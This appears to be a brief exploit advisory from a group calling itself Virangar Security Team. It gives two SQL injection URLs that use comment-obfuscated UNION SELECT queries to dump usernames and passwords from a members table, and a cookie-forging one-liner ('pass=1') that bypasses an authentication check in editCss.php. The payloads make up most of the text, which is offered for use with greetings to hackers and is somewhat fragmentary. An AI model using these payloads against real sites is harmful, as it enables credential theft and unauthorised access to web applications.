#######################################################################################
#######################################################################################
Virangar Security Team
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
exploit:
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/*
or
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/*
#####################
2. Remote Permission Bypass Vulnerability(Insecure Cookie Handling ):
-------vuln codes in:-----------
editCss.php:
/*
if the cookie didn't set for you, you can't allow to see this page…but if we do somethings :) such
as :
javascript:document.cookie = "pass=1; path=/";
young iranian h4ck3rz